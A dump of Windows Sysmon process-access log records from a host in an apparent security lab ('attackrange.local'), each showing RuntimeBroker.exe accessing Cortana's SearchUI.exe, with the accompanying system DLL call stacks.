13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405300C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405340C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405984C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.226{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 